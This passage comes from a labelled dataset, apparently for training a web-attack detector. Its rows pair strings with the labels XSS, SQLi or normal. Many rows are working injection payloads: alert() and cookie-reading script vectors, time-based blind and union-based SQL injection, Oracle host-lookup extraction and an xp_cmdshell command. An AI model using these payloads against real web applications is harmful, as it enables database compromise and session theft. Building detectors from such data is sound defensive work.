style=""list-style:url(http://foo.f)\20url(javascript:alert(93));"">X</div>//[""'`-->]]>]</div>",1,XSS,109 "<basefont oncopy=""alert(1)"" contenteditable>test</basefont>",1,XSS,3719 <fieldset onpointerup=alert(1)>XSS</fieldset>,1,XSS,6705 "1' ) where 1323 = 1323 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12679 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ""lsvg"" like ""lsvg",2,SQLi,13366 a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);,1,XSS,418 <textarea autofocus onfocus=alert(1)>//INJECTX,1,XSS,6519 "<tfoot onkeyup=""alert(1)"" contenteditable>test</tfoot>",1,XSS,4827 "<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src=""data:text/vtt,WEBVTT FILE1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> ""></video>",1,XSS,248 "select * from users where id = 1 or ""_;"" or 1 = 1 -- 1",2,SQLi,17920 "-3595'+ ( select vppx where 6018 = 6018 union all select 6018,6018,6018,6018,6018#",2,SQLi,15090 Select the best hairstyle.,3,normal,24358 now,3,normal,23199 "1%"" ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,16721 "1"" ) ) and make_set ( 1167 = 5027,5027 ) and ( ( ""grfi"" = ""grfi",2,SQLi,16833 "Home Depot: Save up to 40% off select bedding, bath & bath essentials, up to 30% off select storage solutions.",3,normal,26091 "1' and make_set ( 8403 = 8403,8899 ) and 'niux' = 'niux",2,SQLi,17787 1 where 7464 = 7464 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,14700 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""ksip"" like ""ksip",2,SQLi,14217 "1'|| ( select 'wcad' from dual where 4262 = 4262 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14888 "<tt onmouseover=""alert(1)"">test</tt>",1,XSS,8778 "<sup draggable=""true"" ondragleave=""alert(1)"">test</sup>",1,XSS,4608 Select the photos.,3,normal,22857 "1%"" ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16073 "select * from users where id = 1 or $+<$ union select 1,@@VERSION -- 1",2,SQLi,16140 Select your answer ----------------- cell wall nucleus cytoplasm cell membrane 5 Which of the following types of cell is a plant cell?,3,normal,25572 "<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>",1,XSS,41 "select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,14203 "<body onhashchange=""alert(1)"">",1,XSS,9554 "1 ) ) ) union all select null,null,null,null,null,null--",2,SQLi,17616 "With the video open, select ""Edit"" from the top menu. 4.",3,normal,25115 "1 ) where 5598 = 5598 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12658 "{""id"":null,""name"":""Suicune""}",3,normal,26996 "<mark draggable=""true"" ondragend=""alert(1)"">test</mark>",1,XSS,4572 "1%"" ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,17434 select ( case when ( 3626 = 6022 ) then 3626 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13587 Where's the fitness center?,3,normal,23640 "<link onbeforepaste=""alert(1)"" contenteditable>test</link>",1,XSS,3899 "; if not ( substring ( ( select @@version ) ,25,1 ) <> 0 ) waitfor delay '0:0:2' --",2,SQLi,15012 Select a coffee blend to enjoy.,3,normal,24246 <script onblur=alert(1) tabindex=1 id=x></script><input autofocus>,1,XSS,2731 <marquee onpointerout=alert(1)>XSS</marquee>,1,XSS,6853 "javascript:/*""/*`/*'/*\""/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()>",1,XSS,416 "<code onmousemove=""alert(1)"">test</code>",1,XSS,7890 1' ) and ( 2763 = 4004 ) *4004 and ( 'dtts' = 'dtts,2,SQLi,18391 "iif ( 5462 = 8866,1,1/0 )",2,SQLi,21064 Select a game.,3,normal,24818 1' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and 'gpax' = 'gpax,2,SQLi,15640 "<div id=""87""><svg xmlns=""http://www.w3.org/2000/svg"">",1,XSS,5069 1 ) where 4866 = 4866,2,SQLi,21684 "1"" ) ) ) rlike ( select ( case when ( 7975 = 2446 ) then 1 else 0x28 end ) ) and ( ( ( ""qixm"" like ""qixm",2,SQLi,13894 "<strike oncontextmenu=""alert(1)"">test</strike>",1,XSS,6335 or '' ',2,SQLi,22508 <textarea onpointerenter=alert(1)>XSS</textarea>,1,XSS,5934 "1"" ) ) union all select null,null,null--",2,SQLi,19535 %22write('<script>alert(1)</script>')%22,1,XSS,8068 "1 union all select null,null,null,null--",2,SQLi,19523 "{""id"":null,""name"":""down""}",3,normal,27116 "Do such effects generalize, or only pertain to a select few?",3,normal,26240 "<div id=""84""><x xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"" ev:handler=""javascript:alert(84)//#x""/>//[""'`-->]]>]</div><div id=""85""><x xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"" ev:handler=""test.evt#x""/>//[""'`-->]]>]</div><div id=""86""><body oninput=alert(86)><input autofocus>//[""'`-->]]>]</div>",1,XSS,38 "<! foo=""[[[x]]""><x foo=""]foo><script>alert(91)</script>"">",1,XSS,4189 "1 ) ) as rqbo where 2243 = 2243 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11849 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11745 <hgroup onpointerover=alert(1)>XSS</hgroup>,1,XSS,7255 <var id=x tabindex=1 onfocusin=alert(1)></var>,1,XSS,6400 "Up to 40% off select Milwaukee Power Tools, Accessories & more",3,normal,25213 "-9821 ) as qqrm where 7152 = 7152 union all select 7152,7152,7152,7152--",2,SQLi,15956 "1 where 6412 = 6412 union all select null,null,null,null,null,null,null--",2,SQLi,15882 1%' ) union all select null#,2,SQLi,20824 "1"" ) waitfor delay '0:0:5' and ( ""vjpg"" = ""vjpg",2,SQLi,18877 -5918' ) as olzc where 5992 = 5992 or 4390 = 9085,2,SQLi,18550 "1"" ) ) as puws where 7006 = 7006",2,SQLi,20276 Select the perfect wedding jewelry.,3,normal,24392 select case when 1574 = 5523 then 1 else null end--,2,SQLi,18269 "1%' ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12036 or username like '%,2,SQLi,21910 <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>,1,XSS,1748 1%' ) and sleep ( 5 ) and ( '%' = ',2,SQLi,20094 "1 ) as fgqe where 1526 = 1526 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11104 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) ) +'",2,SQLi,18192 "-9119"" ) where 9237 = 9237 or 8571 = 8571--",2,SQLi,19235 or '1' = '1'--,2,SQLi,22208 <animatemotion onpointerleave=alert(1)>XSS</animatemotion>,1,XSS,3957 "{""id"":null,""firstName"":""Thithuy"",""lastName"":""Li"",""address"":""350 Ubi Ave 1 #01-945"",""city"":""217"",""telephone"":""2928656190""}",3,normal,26881 "<script src=1 href=1 onerror=""javascript:alert(1)""></script>",1,XSS,3430 "<li onbeforepaste=""alert(1)"" contenteditable>test</li>",1,XSS,4683 -7903 where 6699 = 6699 or 8571 = 8571--,2,SQLi,19534 "<div onmousemove=""alert(1)"">test</div>",1,XSS,8405 "1' where 1917 = 1917 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14262 "<table draggable=""true"" ondrag=""alert(1)"">test</table>",1,XSS,4749 "-8982' in boolean mode ) union all select 5367,5367,5367,5367,5367,5367#",2,SQLi,15953 <embed id=x onfocusin=alert(1) type=text/html>,1,XSS,6304 <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX,1,XSS,5494 "1' ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( 'nuil' like 'nuil",2,SQLi,12831 "-5748' union all select 1224,1224,1224,1224,1224,1224,1224,1224,1224#",2,SQLi,16319 "1%"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,11223 "{""id"":null,""firstName"":""Han"",""lastName"":""Tan"",""address"":""93 NORTH 9TH STREET, BROOKLYN NY 11211"",""city"":""798"",""telephone"":""5541027493""}",3,normal,27195 "-9295 ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 8752 = 8752",2,SQLi,10131 "As any detailed statement of the critical system, however compressed, would be beyond the limits of the present article, it is proposed here to select only the more salient doctrines, and to point out in connexion with them what advance had been effected by Kant, and what remained for subsequent efforts at complete solution of the problems raised by him.",3,normal,26356 Select your observe.,3,normal,24984 "<multicol onmouseenter=""alert(1)"">test</multicol>",1,XSS,5830 -4215 ) where 5782 = 5782 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10662 Do you hate how sharing from a widescreen / high resolution monitor makes everything so small for Microsoft teams meeting attendees? Select this item to support sharing a custom area of the screen - microsoftteams.uservoice.com / forums / 555103-...,3,normal,26508 "<command onclick=""alert(1)"">test</command>",1,XSS,7354 "<script onmousedown=""alert(1)"">test</script>",1,XSS,6932 1'+ ( select 'ggkm' where 3394 = 3394,2,SQLi,19867 <b id=x tabindex=1 onactivate=alert(1)></b>,1,XSS,7239 1 ) ) as wwys where 9248 = 9248,2,SQLi,20497 "Just add ingredients, select your desired cycle, and press start.",3,normal,25937 <;/br style=a:expression(alert())>;,1,XSS,8994 "-2046' ) union all select 6668,6668--",2,SQLi,19875 "&lt;BGSOUND SRC=\""javascript&#058;alert('XSS');\""&gt;",1,XSS,4863 1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) -- knpw,2,SQLi,10868 "<figure onmouseover=""alert(1)"">test</figure>",1,XSS,6911 "1%"" or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ""%"" = """,2,SQLi,12894 "1' ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'gmbd' = 'gmbd",2,SQLi,12460 "1' ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13515 "<wbr onmouseout=""alert(1)"">test</wbr>",1,XSS,8584 """ This allows you to select ""any"" or ""vacation rentals.",3,normal,26472 You can also select from a number of preset picture modes.,3,normal,25104 "<dir onmouseenter=""alert(1)"">test</dir>",1,XSS,8253 "<div draggable=""true"" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link>",1,XSS,1259 "<details onmouseout=""alert(1)"">test</details>",1,XSS,6683 <dir onpointerout=alert(1)>XSS</dir>,1,XSS,8933 "Investors will be watching the biggest U.S.-based technology and consumer discretionary sector exchange-traded funds, Technology Select Sector SPDR Fund and Consumer Discretionary Select Sector SPDR Fund, as well as the Communication Services Select Sector SPDR Fund, which State Street Corp launched in June to track the new sector.",3,normal,25980 "-4317"" ) ) as nxvn where 2566 = 2566 union all select 2566,2566,2566#",2,SQLi,16344 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></col>",1,XSS,272 "<fieldset onbeforecopy=""alert(1)"" contenteditable>test</fieldset>",1,XSS,2824 &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;,1,XSS,1975 "{""id"":null,""firstName"":""Lim"",""lastName"":""Lilian"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27194 "1', ( select ( case when ( 1570 = 1570 ) then ( select 1570 from pg_sleep ( 5 ) ) else 1/ ( select 0 ) end ) )",2,SQLi,13652 "-5193 where 2175 = 2175 union all select 2175,2175,2175,2175,2175,2175,2175,2175,2175,2175#",2,SQLi,14657 "-3441' ) ) as dxvt where 9291 = 9291 union all select 9291,9291,9291#",2,SQLi,16300 I'm planning to pick up some gardening tools.,3,normal,23886 <nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus>,1,XSS,2772 1' ) ) as gchn where 5856 = 5856,2,SQLi,20298 "<form><input type=search onsearch=alert(1) value=""Hit return"" autofocus>",1,XSS,2331 "<colgroup onmousedown=""alert(1)"">test</colgroup>",1,XSS,5937 "<u onmouseup=""alert(1)"">test</u>",1,XSS,9470 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#",2,SQLi,15463 "<main onmouseover=""alert(1)"">test</main>",1,XSS,7994 <plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus>,1,XSS,1896 select * from users where id = 1.<@. or 1 = 1 -- 1,2,SQLi,18427 "{""id"":null,""name"":""KaiserGreymon""}",3,normal,26962 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and '%' = '",2,SQLi,13882 1'+ ( select uhsy where 4596 = 4596 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) ) +',2,SQLi,14439 <samp id=x tabindex=1 onfocusin=alert(1)></samp>,1,XSS,6046 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,15076 "-5190%"" or 8298 = 9306 and ""%"" = """,2,SQLi,20146 -4137 ) ) as elxu where 5672 = 5672 order by 1--,2,SQLi,18793 "<s draggable=""true"" ondragenter=""alert(1)"">test</s>",1,XSS,5394 "1"" ) ) ) and sleep ( 5 ) and ( ( ( ""fdvc"" like ""fdvc",2,SQLi,18214 1%' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16718 exec master..xp_cmdshell 'ipconfig+/all',2,SQLi,19437 Select decide.,3,normal,24568 microsecond,3,normal,23247 "1"" ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""fkip"" = ""fkip",2,SQLi,10196 "1"" where 7245 = 7245 and 9198 = 9198--",2,SQLi,19700 "?getURL,javascript:alert(1)"",",1,XSS,9612 "<embed src=""javascript:alert(1)"">",1,XSS,9311 "1"" where 1100 = 1100",2,SQLi,21811 UNION ALL SELECT NULL#,2,SQLi,21372 "1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10754 "<style>:target {transform: rotate(180deg);}</style><marquee id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></marquee>",1,XSS,564 "1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( ""fcpm"" = ""fcpm",2,SQLi,10232 "<style>:target {color:red;}</style><object id=x style=""transition:color 1s"" ontransitionend=alert(1)></object>",1,XSS,1033 "1%' ) ) ) union all select null,null--",2,SQLi,19680 "To view a larger version of an image, simply select one of the thumbnails below.",3,normal,25253 `'><script>\x0Djavascript:alert(1)</script>,1,XSS,7061 "1%"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ""%"" = """,2,SQLi,10623 "<center onpaste=""alert(1)"" contenteditable>test</center>",1,XSS,4379 "select * from users where id = 1 or ""; ) "" = 1 or 1 = 1 -- 1",2,SQLi,17134 -1192 order by 1#,2,SQLi,22099 -2817%' ) or 8255 = 3841--,2,SQLi,21015 "<q oncut=""alert(1)"" contenteditable>test</q>",1,XSS,6979 Where's the medium?,3,normal,23657 "-9860%"" union all select 6996,6996,6996,6996,6996,6996#",2,SQLi,17786 "-9749"" where 7083 = 7083 or make_set ( 7577 = 1182,1182 ) --",2,SQLi,17172 "1 ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 9401 = 9401",2,SQLi,11126 "Select the PRIVACY tab and change your settings to MEDIUM, LOW or ACCEPT ALL COOKIES.",3,normal,25590 "<div draggable=""true"" contenteditable>drag me</div><form ondrop=alert(1) contenteditable>drop here</form>",1,XSS,1251 "1"" ) and 8677 = 9054#",2,SQLi,21671 Update your travel plans for the trip.,3,normal,22968 "1%' ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11346 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( ""dskh"" = ""dskh",2,SQLi,13095 "select the device in iTunes, then select Version and Check for Update.",3,normal,25602 Here are some select papers and suggestions for further study.,3,normal,26107 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",2,SQLi,13369 -4952' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'abso' = 'abso,2,SQLi,10081 HAVING 1=1,2,SQLi,22414 Guarded entries can also be useful for aborting actions in a select... then abort construct.,3,normal,26134 "1"" ) as sraw where 1997 = 1997 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11082 "1"" ) union all select null,null#",2,SQLi,20302 "-8943%' ) union all select 7710,7710#",2,SQLi,19833 "1, ( select ( case when ( 3717 = 3717 ) then 1 else 3717* ( select 3717 from master..sysdatabases ) end ) )",2,SQLi,13775 or 1 = 1,2,SQLi,22506 \xE2\x80\x85javascript:javascript:confirm(1),1,XSS,7047 "AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337",2,SQLi,18423 "Under ""Booking Options"" select the option best fit for your needs.",3,normal,25233 &#60,1,XSS,9880 ) or ('1'='1--,2,SQLi,22186 waitfor delay '0:0:5' and ( ( ( 8981 = 8981,2,SQLi,19199 "1'+ ( select 'qrml' where 3791 = 3791 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) +'",2,SQLi,13335 "{""id"":null,""firstName"":""Zhang"",""lastName"":""Enlai"",""address"":""13 Gunnison St"",""city"":""144"",""telephone"":""326301780""}",3,normal,27257 <isindex id=x tabindex=1 onactivate=alert(1)></isindex>,1,XSS,4543 Select reveal.,3,normal,24690 "Select ""Clear all history"" if you want to delete everything.5.",3,normal,25685 "1'+ ( select 'zxxh' where 4065 = 4065 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13689 <p id=x tabindex=1 onfocus=alert(1)></p>,1,XSS,7963 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#",2,SQLi,14464 "{""id"":null,""name"":""Golemon""}",3,normal,26949 AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i,2,SQLi,15010 <small onpointerenter=alert(1)>XSS</small>,1,XSS,7444 <x contenteditable oninput=alert(1)>input here!,1,XSS,6257 "1 ) where 9338 = 9338 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12720 Katie had been helping her select clothing and she certainly knew how to make the most of Carmen's soft curves.,3,normal,25928 <data onpointerup=alert(1)>XSS</data>,1,XSS,8597 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15",2,SQLi,15379 Select your change.,3,normal,25039 1 ) as nsdy where 7513 = 7513,2,SQLi,20706 ";alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//\"";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search",1,XSS,67 ) or ('1′='1–,2,SQLi,22223 Select optimize.,3,normal,24625 <colgroup onpointerdown=alert(1)>XSS</colgroup>,1,XSS,6187 "-6848"" ) ) or 4071 = 5312",2,SQLi,21098 -7950' ) or 9323 = 9323#,2,SQLi,21242 select ( case when ( 9816 = 1693 ) then 9816 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13580 ORDER BY 5#,2,SQLi,22363 )) waitfor delay '0:0:20' --,2,SQLi,20794 select case when 2599 = 7035 then 1 else null end--,2,SQLi,18282 "<b onbeforepaste=""alert(1)"" contenteditable>test</b>",1,XSS,5115 "1"" and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13450 ) or ('x'='x,2,SQLi,22282 Get select bakeware for up to 20% off this weekend.,3,normal,26147 "<video onmousemove=""alert(1)"">test</video>",1,XSS,7515 "1"" waitfor delay '0:0:5' and ""dvfr"" like ""dvfr",2,SQLi,18918 1'+ ( select dklj where 3265 = 3265,2,SQLi,20086 "1"" ) ) as sqow where 8752 = 8752",2,SQLi,20294 <input onpointerout=alert(1)>XSS</input>,1,XSS,8003 "1 ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16083 "<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>",1,XSS,75 "><script+src=https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)""></script>",1,XSS,1845 "<div draggable=""true"" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes>",1,XSS,772 "1 ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 7244 = 7244",2,SQLi,11252 1' in boolean mode ) rlike ( select ( case when ( 1343 = 1595 ) then 1 else 0x28 end ) ) #,2,SQLi,14703 distinct,3,normal,23127 "<SCRIPT DEFER>alert("""")</SCRIPT>",1,XSS,9439 ")) RLIKE SLEEP(5) AND ((1337""=""1337",2,SQLi,20017 "select * from users where id = 1 +$+ union select null,@@VERSION -- 1",2,SQLi,16267 1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,17044 Or select a Medicare Advantage plan that includes drug coverage.,3,normal,25807 "1 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13430 Save up to 30% off select Garage Storage and Organization,3,normal,25725 "<br onkeyup=""alert(1)"" contenteditable>test</br>",1,XSS,5940 "AllowScriptAccess=""always""",1,XSS,9682 "{""id"":null,""firstName"":""Grasyah"",""lastName"":""Santhchez"",""address"":""Bedok Shopping Complex 342 Bedok Road"",""city"":""926"",""telephone"":""1308822990""}",3,normal,26990 1'|| ( select 'vxfx' where 7038 = 7038 and 9306 = 4187 ) ||',2,SQLi,17146 <aside id=x tabindex=1 onbeforeactivate=alert(1)></aside>,1,XSS,4029 Where's the perfect place to take a photography class?,3,normal,23973 "1"" ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16080 "1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'ybjo' = 'ybjo",2,SQLi,14401 <button onReset=javascript:alert(1)>,1,XSS,8977 "<optgroup onmousedown=""alert(1)"">test</optgroup>",1,XSS,5899 "<noscript oncut=""alert(1)"" contenteditable>test</noscript>",1,XSS,3965 <th onblur=alert(1) tabindex=1 id=x></th><input autofocus>,1,XSS,3939 `'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>,1,XSS,4416 "-1212%' ) or make_set ( 7588 = 2306,2306 ) and ( '%' = '",2,SQLi,17608 "<canvas onbeforepaste=""alert(1)"" contenteditable>test</canvas>",1,XSS,3148 1'+ ( select 'unpz' where 8186 = 8186,2,SQLi,19828 Where's the driving range?,3,normal,23608 "<center onmouseup=""alert(1)"">test</center>",1,XSS,7510 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))",2,SQLi,16552 "-5032' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10791 <progress onpointerover=alert(1)>XSS</progress>,1,XSS,6194 "1"" ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ""tlpw"" = ""tlpw",2,SQLi,10014 <var onblur=alert(1) tabindex=1 id=x></var><input autofocus>,1,XSS,3516 "<keygen ondblclick=""alert(1)"">test</keygen>",1,XSS,7275 "1 ) union all select null,null,null#",2,SQLi,19965 "<style>:target {color:red;}</style><data id=x style=""transition:color 1s"" ontransitionend=alert(1)></data>",1,XSS,1205 Determine fields where necessary.,3,normal,23268 "?URI=javascript:alert(1)"",",1,XSS,9694 ORDER BY 21,2,SQLi,22379 &lt;? echo(&apos;&lt;SCR)&apos;;,1,XSS,9414 "<blockquote onmousedown=""alert(1)"">test</blockquote>",1,XSS,5257 "<noframes onmousemove=""alert(1)"">test</noframes>",1,XSS,5959 "Previous research has found that food packaging affects how likely people are to select certain foods, and how good we think it tastes when we do select 